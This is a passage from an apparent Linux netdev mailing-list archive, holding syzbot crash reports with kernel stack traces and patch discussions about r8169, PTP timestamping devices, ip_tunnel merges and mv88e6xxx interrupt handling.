> kernel modules a few times without it crashing.
> 
> v2: Fix the ü in Künig a couple of times
> v3: But the ü should be an ö!

Series applied.

BUG: unable to handle kernel paging request in smc_ib_remember_port_attr

2018-03-25 Thread syzbot


Hello,

syzbot hit the following crash on upstream commit
bcfc1f4554662d8f2429ac8bd96064a59c149754 (Sat Mar 24 16:50:12 2018 +)
Merge tag 'pinctrl-v4.16-3' of  
git://git.kernel.org/pub/scm/linux/kernel/git/linusw/linux-pinctrl
syzbot dashboard link:  
https://syzkaller.appspot.com/bug?extid=5cd61039dc9b8bfa6e47


So far this crash happened 5 times on upstream.
C reproducer: https://syzkaller.appspot.com/x/repro.c?id=4566822275776512
syzkaller reproducer:  
https://syzkaller.appspot.com/x/repro.syz?id=5414431521505280
Raw console output:  
https://syzkaller.appspot.com/x/log.txt?id=5642358322364416
Kernel config:  
https://syzkaller.appspot.com/x/.config?id=-5034017172441945317

compiler: gcc (GCC) 7.1.1 20170620

IMPORTANT: if you fix the bug, please add the following tag to the commit:
Reported-by: syzbot+5cd61039dc9b8bfa6...@syzkaller.appspotmail.com
It will help syzbot understand when the bug is fixed. See footer for  
details.

If you forward the report, please keep this part and the footer.

BUG: unable to handle kernel paging request at fc00
IP: bytes_is_nonzero mm/kasan/kasan.c:166 [inline]
IP: memory_is_nonzero mm/kasan/kasan.c:184 [inline]
IP: memory_is_poisoned_n mm/kasan/kasan.c:210 [inline]
IP: memory_is_poisoned mm/kasan/kasan.c:241 [inline]
IP: check_memory_region_inline mm/kasan/kasan.c:257 [inline]
IP: check_memory_region+0x83/0x190 mm/kasan/kasan.c:267
PGD 0 P4D 0
Oops:  [#1] SMP KASAN
Dumping ftrace buffer:
   (ftrace buffer empty)
Modules linked in:
CPU: 0 PID: 4138 Comm: syzkaller407129 Not tainted 4.16.0-rc6+ #1
Hardware name: Google Google Compute Engine/Google Compute Engine, BIOS  
Google 01/01/2011

RIP: 0010:bytes_is_nonzero mm/kasan/kasan.c:166 [inline]
RIP: 0010:memory_is_nonzero mm/kasan/kasan.c:184 [inline]
RIP: 0010:memory_is_poisoned_n mm/kasan/kasan.c:210 [inline]
RIP: 0010:memory_is_poisoned mm/kasan/kasan.c:241 [inline]
RIP: 0010:check_memory_region_inline mm/kasan/kasan.c:257 [inline]
RIP: 0010:check_memory_region+0x83/0x190 mm/kasan/kasan.c:267
RSP: 0018:8801b8c472e0 EFLAGS: 00010282
RAX: fc00 RBX: 0017 RCX: 85a53701
RDX: 0001 RSI: 0040 RDI: ffd8
RBP: 8801b8c472f0 R08: fc01 R09: dc03
R10: e008 R11: dc02 R12: dc03
R13:  R14:  R15: ffd8
FS:  00a75880() GS:8801db20() knlGS:
CS:  0010 DS:  ES:  CR0: 80050033
CR2: fc00 CR3: 0001ceb8a001 CR4: 001606f0
DR0:  DR1:  DR2: 
DR3:  DR6: fffe0ff0 DR7: 0400
Call Trace:
 memset+0x23/0x40 mm/kasan/kasan.c:285
 memset include/linux/string.h:330 [inline]
 smc_ib_remember_port_attr+0x91/0x340 net/smc/smc_ib.c:419
 smc_pnet_add+0xb43/0xde0 net/smc/smc_pnet.c:354
 genl_family_rcv_msg+0x7b7/0xfb0 net/netlink/genetlink.c:599
 genl_rcv_msg+0xb2/0x140 net/netlink/genetlink.c:624
 netlink_rcv_skb+0x14b/0x380 net/netlink/af_netlink.c:2444
 genl_rcv+0x28/0x40 net/netlink/genetlink.c:635
 netlink_unicast_kernel net/netlink/af_netlink.c:1308 [inline]
 netlink_unicast+0x4c4/0x6b0 net/netlink/af_netlink.c:1334
 netlink_sendmsg+0xa4a/0xe60 net/netlink/af_netlink.c:1897
 sock_sendmsg_nosec net/socket.c:630 [inline]
 sock_sendmsg+0xca/0x110 net/socket.c:640
 ___sys_sendmsg+0x767/0x8b0 net/socket.c:2046
 __sys_sendmsg+0xe5/0x210 net/socket.c:2080
 SYSC_sendmsg net/socket.c:2091 [inline]
 SyS_sendmsg+0x2d/0x50 net/socket.c:2087
 do_syscall_64+0x281/0x940 arch/x86/entry/common.c:287
 entry_SYSCALL_64_after_hwframe+0x42/0xb7
RIP: 0033:0x43fda9
RSP: 002b:7ffd35aa5268 EFLAGS: 0213 ORIG_RAX: 002e
RAX: ffda RBX: 004002c8 RCX: 0043fda9
RDX: 00040004 RSI: 20a87fc8 RDI: 0003
RBP: 006ca018 R08: 004002c8 R09: 004002c8
R10: 004002c8 R11: 0213 R12: 004016d0
R13: 00401760 R14:  R15: 
Code: fa 10 7f 3d 4d 85 d2 74 33 41 80 39 00 75 21 48 b8 01 00 00 00 00 fc  
ff df 4d 01 d1 49 01 c0 4d 39 c1 4c 89 c0 74 15 49 83 c0 01 <80> 38 00 74  
ef 48 85 c0 49 89 c0 0f 85 89 00 00 00 5b 41 5c 5d

RIP: bytes_is_nonzero mm/kasan/kasan.c:166 [inline] RSP: 8801b8c472e0
RIP: memory_is_nonzero mm/kasan/kasan.c:184 [inline] RSP: 8801b8c472e0
RIP: memory_is_poisoned_n mm/kasan/kasan.c:210 [inline] RSP:  
8801b8c472e0

RIP: memory_is_poisoned mm/kasan/kasan.c:241 [inline] RSP: 8801b8c472e0
RIP: check_memory_region_inline mm/kasan/kasan.c:257 [inline] RSP:  
8801b8c472e0
RIP: check_memory_region+0x83/0x190 mm/kasan/kasan.c:267 RSP:  
8801b8c472e0

CR2: fc00
---[ end trace 327b8c6e0903b0d7 ]---


---
This bug is generated by a dumb bot. It may contain errors.
See https://goo.gl/tpsmEJ for details.
Direct all questions to syzkal...@goo

general protection fault in tipc_sk_fill_sock_diag

2018-03-25 Thread syzbot


Hello,

syzbot hit the following crash on net-next commit
94cb5492409219ee3f9468616dd58af314029f76 (Fri Mar 23 18:31:30 2018 +)
net/sched: act_vlan: declare push_vid with host byte order
syzbot dashboard link:  
https://syzkaller.appspot.com/bug?extid=326e587eff1074657718


So far this crash happened 8 times on net-next.
C reproducer: https://syzkaller.appspot.com/x/repro.c?id=5316828523921408
syzkaller reproducer:  
https://syzkaller.appspot.com/x/repro.syz?id=5398288350052352
Raw console output:  
https://syzkaller.appspot.com/x/log.txt?id=5097949340106752
Kernel config:  
https://syzkaller.appspot.com/x/.config?id=2445237949826843652

compiler: gcc (GCC) 7.1.1 20170620

IMPORTANT: if you fix the bug, please add the following tag to the commit:
Reported-by: syzbot+326e587eff1074657...@syzkaller.appspotmail.com
It will help syzbot understand when the bug is fixed. See footer for  
details.

If you forward the report, please keep this part and the footer.

audit: type=1400 audit(1522009585.022:6): avc:  denied  { map } for   
pid=4261 comm="bash" path="/bin/bash" dev="sda1" ino=1457  
scontext=unconfined_u:system_r:insmod_t:s0-s0:c0.c1023  
tcontext=system_u:object_r:file_t:s0 tclass=file permissive=1
audit: type=1400 audit(1522009597.461:7): avc:  denied  { map } for   
pid=4277 comm="syzkaller549428" path="/root/syzkaller549428900" dev="sda1"  
ino=16481 scontext=unconfined_u:system_r:insmod_t:s0-s0:c0.c1023  
tcontext=unconfined_u:object_r:user_home_t:s0 tclass=file permissive=1

kasan: CONFIG_KASAN_INLINE enabled
kasan: GPF could be caused by NULL-ptr deref or user memory access
general protection fault:  [#1] SMP KASAN
Dumping ftrace buffer:
   (ftrace buffer empty)
Modules linked in:
CPU: 0 PID: 4277 Comm: syzkaller549428 Not tainted 4.16.0-rc6+ #280
Hardware name: Google Google Compute Engine/Google Compute Engine, BIOS  
Google 01/01/2011

RIP: 0010:sk_user_ns include/net/sock.h:748 [inline]
RIP: 0010:tipc_sk_fill_sock_diag+0x42d/0xc00 net/tipc/socket.c:3282
RSP: 0018:8801b017eff0 EFLAGS: 00010206
RAX:  RBX: 11003602fe04 RCX: 002b
RDX: dc00 RSI: 110035d4b577 RDI: 0158
RBP: 8801b017f2a8 R08: 11003602fdbf R09: 
R10:  R11:  R12: 8801d1637740
R13: 8801b0d50d40 R14: 8801b017f280 R15: 
FS:  014a6880() GS:8801db20() knlGS:
CS:  0010 DS:  ES:  CR0: 80050033
CR2: 20005000 CR3: 0001b01b3005 CR4: 001606f0
DR0:  DR1:  DR2: 
DR3:  DR6: fffe0ff0 DR7: 0400
Call Trace:
 __tipc_add_sock_diag+0x20e/0x330 net/tipc/diag.c:62
 tipc_nl_sk_walk+0x565/0xb60 net/tipc/socket.c:3240
 tipc_diag_dump+0x24/0x30 net/tipc/diag.c:73
 netlink_dump+0x492/0xcf0 net/netlink/af_netlink.c:
 __netlink_dump_start+0x4ec/0x710 net/netlink/af_netlink.c:2319
 netlink_dump_start include/linux/netlink.h:214 [inline]
 tipc_sock_diag_handler_dump+0x206/0x2c0 net/tipc/diag.c:89
 __sock_diag_cmd net/core/sock_diag.c:230 [inline]
 sock_diag_rcv_msg+0x204/0x360 net/core/sock_diag.c:261
 netlink_rcv_skb+0x14b/0x380 net/netlink/af_netlink.c:2444
 sock_diag_rcv+0x2a/0x40 net/core/sock_diag.c:272
 netlink_unicast_kernel net/netlink/af_netlink.c:1308 [inline]
 netlink_unicast+0x4c4/0x6b0 net/netlink/af_netlink.c:1334
 netlink_sendmsg+0xa4a/0xe60 net/netlink/af_netlink.c:1897
 sock_sendmsg_nosec net/socket.c:629 [inline]
 sock_sendmsg+0xca/0x110 net/socket.c:639
 ___sys_sendmsg+0x767/0x8b0 net/socket.c:2047
 __sys_sendmsg+0xe5/0x210 net/socket.c:2081
 SYSC_sendmsg net/socket.c:2092 [inline]
 SyS_sendmsg+0x2d/0x50 net/socket.c:2088
 do_syscall_64+0x281/0x940 arch/x86/entry/common.c:287
 entry_SYSCALL_64_after_hwframe+0x42/0xb7
RIP: 0033:0x43fde9
RSP: 002b:7ffc6f197198 EFLAGS: 0213 ORIG_RAX: 002e
RAX: ffda RBX: 004002c8 RCX: 0043fde9
RDX:  RSI: 20005000 RDI: 0003
RBP: 006ca018 R08: 004002c8 R09: 004002c8
R10: 004002c8 R11: 0213 R12: 00401710
R13: 004017a0 R14:  R15: 
Code: f9 48 c1 e9 03 80 3c 11 00 0f 85 b5 07 00 00 4d 8b 7f 18 48 ba 00 00  
00 00 00 fc ff df 49 8d bf 58 01 00 00 48 89 f9 48 c1 e9 03 <80> 3c 11 00  
0f 85 2b 07 00 00 4d 8b bf 58 01 00 00 48 ba 00 00

RIP: sk_user_ns include/net/sock.h:748 [inline] RSP: 8801b017eff0
RIP: tipc_sk_fill_sock_diag+0x42d/0xc00 net/tipc/socket.c:3282 RSP:  
8801b017eff0

---[ end trace ae417c2a60a8b333 ]---


---
This bug is generated by a dumb bot. It may contain errors.
See https://goo.gl/tpsmEJ for details.
Direct all questions to syzkal...@googlegroups.com.

syzbot will keep track of this bug report.
If you forgot to add the Reported-by tag, once the fix for this bug is  
merged

into any tree, please reply to this

possible deadlock in handle_rx

2018-03-25 Thread syzbot


Hello,

syzbot hit the following crash on upstream commit
cb6416592bc2a8b731dabcec0d63cda270764fc6 (Sun Mar 25 17:45:10 2018 +)
Merge tag 'dmaengine-fix-4.16-rc7' of  
git://git.kernel.org/pub/scm/linux/kernel/git/vkoul/slave-dma
syzbot dashboard link:  
https://syzkaller.appspot.com/bug?extid=7f073540b1384a614e09


So far this crash happened 4 times on upstream.
C reproducer: https://syzkaller.appspot.com/x/repro.c?id=6506789075943424
syzkaller reproducer:  
https://syzkaller.appspot.com/x/repro.syz?id=5716250550337536
Raw console output:  
https://syzkaller.appspot.com/x/log.txt?id=5142038655795200
Kernel config:  
https://syzkaller.appspot.com/x/.config?id=-5034017172441945317

compiler: gcc (GCC) 7.1.1 20170620

IMPORTANT: if you fix the bug, please add the following tag to the commit:
Reported-by: syzbot+7f073540b1384a614...@syzkaller.appspotmail.com
It will help syzbot understand when the bug is fixed. See footer for  
details.

If you forward the report, please keep this part and the footer.



WARNING: possible recursive locking detected
4.16.0-rc6+ #366 Not tainted

vhost-4248/4760 is trying to acquire lock:
 (&vq->mutex){+.+.}, at: [<3482bddc>] vhost_net_rx_peek_head_len  
drivers/vhost/net.c:633 [inline]
 (&vq->mutex){+.+.}, at: [<3482bddc>] handle_rx+0xeb1/0x19c0  
drivers/vhost/net.c:784


but task is already holding lock:
 (&vq->mutex){+.+.}, at: [<4de72f44>] handle_rx+0x1f5/0x19c0  
drivers/vhost/net.c:766


other info that might help us debug this:
 Possible unsafe locking scenario:

   CPU0
   
  lock(&vq->mutex);
  lock(&vq->mutex);

 *** DEADLOCK ***

 May be due to missing lock nesting notation

1 lock held by vhost-4248/4760:
 #0:  (&vq->mutex){+.+.}, at: [<4de72f44>] handle_rx+0x1f5/0x19c0  
drivers/vhost/net.c:766


stack backtrace:
CPU: 0 PID: 4760 Comm: vhost-4248 Not tainted 4.16.0-rc6+ #366
Hardware name: Google Google Compute Engine/Google Compute Engine, BIOS  
Google 01/01/2011

Call Trace:
 __dump_stack lib/dump_stack.c:17 [inline]
 dump_stack+0x194/0x24d lib/dump_stack.c:53
 print_deadlock_bug kernel/locking/lockdep.c:1761 [inline]
 check_deadlock kernel/locking/lockdep.c:1805 [inline]
 validate_chain kernel/locking/lockdep.c:2401 [inline]
 __lock_acquire+0xe8f/0x3e00 kernel/locking/lockdep.c:3431
 lock_acquire+0x1d5/0x580 kernel/locking/lockdep.c:3920
 __mutex_lock_common kernel/locking/mutex.c:756 [inline]
 __mutex_lock+0x16f/0x1a80 kernel/locking/mutex.c:893
 mutex_lock_nested+0x16/0x20 kernel/locking/mutex.c:908
 vhost_net_rx_peek_head_len drivers/vhost/net.c:633 [inline]
 handle_rx+0xeb1/0x19c0 drivers/vhost/net.c:784
 handle_rx_net+0x19/0x20 drivers/vhost/net.c:910
 vhost_worker+0x268/0x470 drivers/vhost/vhost.c:361
 kthread+0x33c/0x400 kernel/kthread.c:238
 ret_from_fork+0x3a/0x50 arch/x86/entry/entry_64.S:406


---
This bug is generated by a dumb bot. It may contain errors.
See https://goo.gl/tpsmEJ for details.
Direct all questions to syzkal...@googlegroups.com.

syzbot will keep track of this bug report.
If you forgot to add the Reported-by tag, once the fix for this bug is  
merged

into any tree, please reply to this email with:
#syz fix: exact-commit-title
If you want to test a patch for this bug, please reply with:
#syz test: git://repo/address.git branch
and provide the patch inline or as an attachment.
To mark this as a duplicate of another syzbot report, please reply with:
#syz dup: exact-subject-of-another-report
If it's a one-off invalid bug report, please reply with:
#syz invalid
Note: if the crash happens again, it will cause creation of a new bug  
report.

Note: all commands must start from beginning of the line in the email body.

Re: [PATCH net] r8169: fix setting driver_data after register_netdev

2018-03-25 Thread Andrew Lunn

On Mon, Mar 26, 2018 at 01:07:00AM +0200, Francois Romieu wrote:
> Heiner Kallweit  :
> > pci_set_drvdata() is called only after registering the net_device,
> > therefore we could run into a NPE if one of the functions using
> > driver_data is called before it's set.
> > 
> > Fix this by calling pci_set_drvdata() before registering the
> > net_device.
> > 
> > This fix is a candidate for stable. As far as I can see the
> > bug has been there in kernel version 3.2 already, therefore
> > I can't provide a reference which commit is fixed by it.
> 
> It does not sound convincing.
> 
> Please tell which functions are supposed to crash.

How about rtl8169_get_wol() and rtl8169_set_wol(). And
rtl8169_get_ethtool_stats().  Basically anything which makes use of
run time power management could be invoked as soon as parts of
register_netdev() have been called.

  Andrew

Re: [PATCH net] r8169: fix setting driver_data after register_netdev

2018-03-25 Thread Francois Romieu

Heiner Kallweit  :
> pci_set_drvdata() is called only after registering the net_device,
> therefore we could run into a NPE if one of the functions using
> driver_data is called before it's set.
> 
> Fix this by calling pci_set_drvdata() before registering the
> net_device.
> 
> This fix is a candidate for stable. As far as I can see the
> bug has been there in kernel version 3.2 already, therefore
> I can't provide a reference which commit is fixed by it.

It does not sound convincing.

Please tell which functions are supposed to crash.

Suspend / resume ones ? Anything else ?

-- 
Ueimor

Re: [PATCH net-next RFC V1 5/5] net: mdio: Add a driver for InES time stamping IP core.

2018-03-25 Thread Andrew Lunn

> > in the future some devices will be MDIO, or I2C, or SPI. Just call it
> > ptpdev. This ptpdev needs to be control bus agnostic. You need a
> > ptpdev core API exposing functions like ptpdev_hwtstamp,
> > ptpdev_rxtstamp, ptpdev_txtstamp, ptpdev_link_change, which take a
> > ptpdev.
> 
> Well, this name is not ideal, since time stamping devices in general
> can time stamp any frame, not just PTP frames.

Hi Richard

I don't really care about the name. I care about the semantics of the
API. How about ieee1588_rxtstamp, ieee1588_txtstamp, etc.

  Andrew

Re: [PATCH net-next RFC V1 5/5] net: mdio: Add a driver for InES time stamping IP core.

2018-03-25 Thread Florian Fainelli

On 03/25/2018 03:10 PM, Richard Cochran wrote:
> On Sun, Mar 25, 2018 at 05:59:37PM +0200, Andrew Lunn wrote:
 3) How do you limit the MAC/PHY to what the PTP device can do.
>>>
>>> Hm, I don't think this is important.
>>
>> So you are happy that the PTP device will cause the MC/PHY link to
>> break down when it is asked to do something it cannot do?
> 
> No, but I do expect the system designer to use common sense.  No need
> to over engineer this now just to catch hypothetical future problems.
> 
>>> Right, so phylib can operate on phydev->attached_dev->mdiots;
>>
>> So first off, it is not an MDIO device.
> 
> ...
> 
>> To keep lifecycle issues simple, i would also keep it in phydev, not
>> netdev.
>>
>> mdiots as a name is completely wrong. It is not an MDIO device.
> 
> I am well aware of what terms MDIO and MII represent, but our current
> code is hopelessly confused.  Case in point:
> 
>   static inline struct mii_bus *mdiobus_alloc(void);
> 
> The kernel's 'struct mii_bus' is really only about MDIO and not about
> the rest of MII.  Clearly MII time stamping devices belong on the MII
> bus, so that is where I put them.

They do, if and only if their control path goes through the MDIO bus,
this one does not, see below.

> 
> Or maybe mii_bus should first be renamed to mdio_bus?  That you pave
> the way for introducing a representation of the MII bus.

It would have been ideal to name this structure mdio_bus, because that
is what it indeed is. An argument could be made this is true about a lot
of devices though, e.g: PCIe end point drivers do register a
pci_driver/device, not a pcie_driver/device...

Andrew still has a valid point though that devices are child of their
control bus, not data bus. The data bus here is MII, but the control bus
is here through MMIO register, therefore platform device in Linux's
device driver model so we would expect the

The best that I can think about and it still is a hack in some way, is
to you have your time stamping driver create a proxy mii_bus whose
purpose is just to hook to mdio/phy_device events (such as link changes)
in order to do what is necessary, or at least, this would indicate its
transparent nature towards the MDIO/MDC lines...

What is not great in your current binding is that you created a notion
of "port" which is tied to the timestamper device, whereas it really
seems to be a property of the Ethernet controller, where the datapath
being timestamped resides.

Tangential: the existing PHY time stamping logic should probably be
generalized to a mdio_device (which the phy_device is a specialized
superset of) instead of to the phy_device. This would still allow
existing use cases but it would also allow us to support possible "pure
MDIO" devices would that become some thing in the future.

> 
>> in the future some devices will be MDIO, or I2C, or SPI. Just call it
>> ptpdev. This ptpdev needs to be control bus agnostic. You need a
>> ptpdev core API exposing functions like ptpdev_hwtstamp,
>> ptpdev_rxtstamp, ptpdev_txtstamp, ptpdev_link_change, which take a
>> ptpdev.
> 
> Well, this name is not ideal, since time stamping devices in general
> can time stamp any frame, not just PTP frames.
> 
>> You can then clean up the code in timestamping.c. Code like:
>>
>> phydev = skb->dev->phydev;
>> if (likely(phydev->drv->txtstamp)) {
>> clone = skb_clone_sk(skb);
>> if (!clone)
>> return;
>> phydev->drv->txtstamp(phydev, clone, type);
>> }
>>
>> violates the layering, and the locking looks broken.
> 
> Are you sure the locking is broken?  If so, how?
> 
> (This code path has been reviewed more than once.)
> 
> Can you please explain the layering and how this code breaks it?

I see it both ways, you either invoke an operation to timestamp which
goes into an abstract "timestamping device" which invokes a driver to
determine the actual operation, or you can do what you did which was to
augment struct net_device with a phy_device, under the premise this will
be the only type of timestamping capable device we will ever see.

This is no longer holding true, your patches are a testament to that, so
now you need another member: mdiots, as you can see, there is now
overlap between the two, because a phy_device should arguably be
encapsulating a mdiots device object...

> 
> (This code goes back to 2.6.36 and perhaps predates the layers that
> were added later on.)
> 
> Thanks,
> Richard
> 

-- 
Florian

Re: [PATCH net-next RFC V1 5/5] net: mdio: Add a driver for InES time stamping IP core.

2018-03-25 Thread Andrew Lunn

> > You can then clean up the code in timestamping.c. Code like:
> > 
> > phydev = skb->dev->phydev;
> > if (likely(phydev->drv->txtstamp)) {
> > clone = skb_clone_sk(skb);
> > if (!clone)
> > return;
> > phydev->drv->txtstamp(phydev, clone, type);
> > }
> > 
> > violates the layering, and the locking looks broken.
> 
> Are you sure the locking is broken?  If so, how?

As a general rule of thumb, locking is performed in the core when
possible. Experience has shown that device driver writers get locking
wrong more often than core code writers. So doing it once in the core
results in less bugs.

The phylib core code will take the phydev lock before calling into the
driver. By violating the layering, we are missing on this lock.

Maybe the one driver which currently implements these calls does not
need locking. But after the Marvell DSA work, we have most of the code
needed to implement support for the Marvell PHY PTP. It has pretty
similar registers. That would need the phydev lock to be held, because
we need to swap to different pages, so any other calls happening in
parallel are going to see registers from the wrong page. I don't want
to have to put these locks in the driver, that leads to bugs. The core
should do it.

   Andrew

[PATCH net] r8169: fix setting driver_data after register_netdev

2018-03-25 Thread Heiner Kallweit

pci_set_drvdata() is called only after registering the net_device,
therefore we could run into a NPE if one of the functions using
driver_data is called before it's set.

Fix this by calling pci_set_drvdata() before registering the
net_device.

This fix is a candidate for stable. As far as I can see the
bug has been there in kernel version 3.2 already, therefore
I can't provide a reference which commit is fixed by it.

The fix may need small adjustments per kernel version because
due to other changes the label which is jumped to if
register_netdev() fails has changed over time.

Reported-by: David Miller 
Signed-off-by: Heiner Kallweit 
---
 drivers/net/ethernet/realtek/r8169.c | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

diff --git a/drivers/net/ethernet/realtek/r8169.c 
b/drivers/net/ethernet/realtek/r8169.c
index 630409e0..604ae783 100644
--- a/drivers/net/ethernet/realtek/r8169.c
+++ b/drivers/net/ethernet/realtek/r8169.c
@@ -8378,12 +8378,12 @@ static int rtl_init_one(struct pci_dev *pdev, const 
struct pci_device_id *ent)
if (!tp->counters)
return -ENOMEM;
 
+   pci_set_drvdata(pdev, dev);
+
rc = register_netdev(dev);
if (rc < 0)
return rc;
 
-   pci_set_drvdata(pdev, dev);
-
netif_info(tp, probe, dev, "%s at 0x%p, %pM, XID %08x IRQ %d\n",
   rtl_chip_infos[chipset].name, tp->mmio_addr, dev->dev_addr,
   (u32)(RTL_R32(tp, TxConfig) & 0x9cf0f8ff),
-- 
2.16.2

linux-next: manual merge of the ipsec tree with the net tree

2018-03-25 Thread Stephen Rothwell

Hi Steffen,

Today's linux-next merge of the ipsec tree got a conflict in:

  net/ipv4/ip_tunnel.c

between commit:

  f6cc9c054e77 ("ip_tunnel: Emit events for post-register MTU changes")

from the net tree and commit:

  24fc79798b8d ("ip_tunnel: Clamp MTU to bounds on new link")

from the ipsec tree.

I fixed it up (see below) and can carry the fix as necessary. This
is now fixed as far as linux-next is concerned, but any non trivial
conflicts should be mentioned to your upstream maintainer when your tree
is submitted for merging.  You may also want to consider cooperating
with the maintainer of the conflicting tree to minimise any particularly
complex conflicts.

-- 
Cheers,
Stephen Rothwell

diff --cc net/ipv4/ip_tunnel.c
index 7b85ffad5d74,7c76dd17b6b9..
--- a/net/ipv4/ip_tunnel.c
+++ b/net/ipv4/ip_tunnel.c
@@@ -1117,10 -1108,13 +1117,15 @@@ int ip_tunnel_newlink(struct net_devic
eth_hw_addr_random(dev);
  
mtu = ip_tunnel_bind_dev(dev);
-   if (!tb[IFLA_MTU]) {
+   if (tb[IFLA_MTU]) {
+   unsigned int max = 0xfff8 - dev->hard_header_len - nt->hlen;
+ 
+   dev->mtu = clamp(dev->mtu, (unsigned int)ETH_MIN_MTU,
+(unsigned int)(max - sizeof(struct iphdr)));
+   } else {
 -  dev->mtu = mtu;
 +  err = dev_set_mtu(dev, mtu);
 +  if (err)
 +  goto err_dev_set_mtu;
}
  
ip_tunnel_add(itn, nt);


pgpChhvgOn4lq.pgp
Description: OpenPGP digital signature

Re: [PATCH net-next RFC V1 5/5] net: mdio: Add a driver for InES time stamping IP core.

2018-03-25 Thread Richard Cochran

On Sun, Mar 25, 2018 at 05:59:37PM +0200, Andrew Lunn wrote:
> To keep lifecycle issues simple, i would also keep it in phydev, not
> netdev.

Okay.

Since we don't have any representation for MII anyhow, it seems equally
fitting to attach this to the PHY's data structure as to the MAC's.

Thanks,
Richard

Re: [PATCH net-next RFC V1 5/5] net: mdio: Add a driver for InES time stamping IP core.

2018-03-25 Thread Richard Cochran

On Sun, Mar 25, 2018 at 05:59:37PM +0200, Andrew Lunn wrote:
> > > 3) How do you limit the MAC/PHY to what the PTP device can do.
> > 
> > Hm, I don't think this is important.
> 
> So you are happy that the PTP device will cause the MC/PHY link to
> break down when it is asked to do something it cannot do?

No, but I do expect the system designer to use common sense.  No need
to over engineer this now just to catch hypothetical future problems.

> > Right, so phylib can operate on phydev->attached_dev->mdiots;
> 
> So first off, it is not an MDIO device.

...

> To keep lifecycle issues simple, i would also keep it in phydev, not
> netdev.
> 
> mdiots as a name is completely wrong. It is not an MDIO device.

I am well aware of what terms MDIO and MII represent, but our current
code is hopelessly confused.  Case in point:

static inline struct mii_bus *mdiobus_alloc(void);

The kernel's 'struct mii_bus' is really only about MDIO and not about
the rest of MII.  Clearly MII time stamping devices belong on the MII
bus, so that is where I put them.

Or maybe mii_bus should first be renamed to mdio_bus?  That you pave
the way for introducing a representation of the MII bus.

> in the future some devices will be MDIO, or I2C, or SPI. Just call it
> ptpdev. This ptpdev needs to be control bus agnostic. You need a
> ptpdev core API exposing functions like ptpdev_hwtstamp,
> ptpdev_rxtstamp, ptpdev_txtstamp, ptpdev_link_change, which take a
> ptpdev.

Well, this name is not ideal, since time stamping devices in general
can time stamp any frame, not just PTP frames.

> You can then clean up the code in timestamping.c. Code like:
> 
> phydev = skb->dev->phydev;
> if (likely(phydev->drv->txtstamp)) {
> clone = skb_clone_sk(skb);
> if (!clone)
> return;
> phydev->drv->txtstamp(phydev, clone, type);
> }
> 
> violates the layering, and the locking looks broken.

Are you sure the locking is broken?  If so, how?

(This code path has been reviewed more than once.)

Can you please explain the layering and how this code breaks it?

(This code goes back to 2.6.36 and perhaps predates the layers that
were added later on.)

Thanks,
Richard

Re: [PATCH v3 net-next 1/2] net: dsa: mv88e6xxx: Use the DT IRQ trigger mode

2018-03-25 Thread Uwe Kleine-König

Hi Andrew,

On Mon, Mar 26, 2018 at 12:02:37AM +0200, Andrew Lunn wrote:
> On Sun, Mar 25, 2018 at 11:54:24PM +0200, Uwe Kleine-König wrote:
> > On Sun, Mar 25, 2018 at 11:43:14PM +0200, Andrew Lunn wrote:
> > > By calling request_threaded_irq() with the flag IRQF_TRIGGER_FALLING
> > > we override the trigger mode provided in device tree. And the
> > > interrupt is actually active low, which is what all the current device
> > > tree descriptions use.
> > > 
> > > Suggested-by: Uwe Kleine-König 
> > > Signed-off-by: Andrew Lunn 
> > Thanks Andrew for the respin.
> 
> Sorry for getting your name wrong so many time. I should know better,
> 'little king' makes sense.

No problem. Making mistakes is fine if you're ready to correct them :-)

Best regards
Uwe

-- 
Pengutronix e.K.   | Uwe Kleine-König|
Industrial Linux Solutions | http://www.pengutronix.de/  |

Re: [PATCH v3 net-next 1/2] net: dsa: mv88e6xxx: Use the DT IRQ trigger mode

2018-03-25 Thread Andrew Lunn

On Sun, Mar 25, 2018 at 11:54:24PM +0200, Uwe Kleine-König wrote:
> On Sun, Mar 25, 2018 at 11:43:14PM +0200, Andrew Lunn wrote:
> > By calling request_threaded_irq() with the flag IRQF_TRIGGER_FALLING
> > we override the trigger mode provided in device tree. And the
> > interrupt is actually active low, which is what all the current device
> > tree descriptions use.
> > 
> > Suggested-by: Uwe Kleine-König 
> > Signed-off-by: Andrew Lunn 
> Thanks Andrew for the respin.

Hi Uwe

Sorry for getting your name wrong so many time. I should know better,
'little king' makes sense.

Andrew

Re: [PATCH v3 net-next 1/2] net: dsa: mv88e6xxx: Use the DT IRQ trigger mode

2018-03-25 Thread Uwe Kleine-König

On Sun, Mar 25, 2018 at 11:43:14PM +0200, Andrew Lunn wrote:
> By calling request_threaded_irq() with the flag IRQF_TRIGGER_FALLING
> we override the trigger mode provided in device tree. And the
> interrupt is actually active low, which is what all the current device
> tree descriptions use.
> 
> Suggested-by: Uwe Kleine-König 
> Signed-off-by: Andrew Lunn 
Thanks Andrew for the respin.

Acked-by: Uwe Kleine-König 
Tested-by: Uwe Kleine-König 

Best regards
Uwe

-- 
Pengutronix e.K.   | Uwe Kleine-König|
Industrial Linux Solutions | http://www.pengutronix.de/  |

[PATCH v3 net-next 2/2] net: dsa: mv88e6xxx: Call the common IRQ free code

2018-03-25 Thread Andrew Lunn

When free'ing the polled IRQs, call the common irq free code.
Otherwise the interrupts are left registered, and when we come to load
the driver a second time, we get an Opps.

Signed-off-by: Andrew Lunn 
---
 drivers/net/dsa/mv88e6xxx/chip.c | 2 ++
 1 file changed, 2 insertions(+)

diff --git a/drivers/net/dsa/mv88e6xxx/chip.c b/drivers/net/dsa/mv88e6xxx/chip.c
index 3ba77067a3dc..9a5d786b4885 100644
--- a/drivers/net/dsa/mv88e6xxx/chip.c
+++ b/drivers/net/dsa/mv88e6xxx/chip.c
@@ -467,6 +467,8 @@ static int mv88e6xxx_irq_poll_setup(struct mv88e6xxx_chip 
*chip)
 
 static void mv88e6xxx_irq_poll_free(struct mv88e6xxx_chip *chip)
 {
+   mv88e6xxx_g1_irq_free_common(chip);
+
kthread_cancel_delayed_work_sync(&chip->irq_poll_work);
kthread_destroy_worker(chip->kworker);
 }
-- 
2.16.2

[PATCH v3 net-next 1/2] net: dsa: mv88e6xxx: Use the DT IRQ trigger mode

2018-03-25 Thread Andrew Lunn

By calling request_threaded_irq() with the flag IRQF_TRIGGER_FALLING
we override the trigger mode provided in device tree. And the
interrupt is actually active low, which is what all the current device
tree descriptions use.

Suggested-by: Uwe Kleine-König 
Signed-off-by: Andrew Lunn 
---
v2: Fix the ü in Künig
v3: Which should actually be an ö
---
 drivers/net/dsa/mv88e6xxx/chip.c | 2 +-
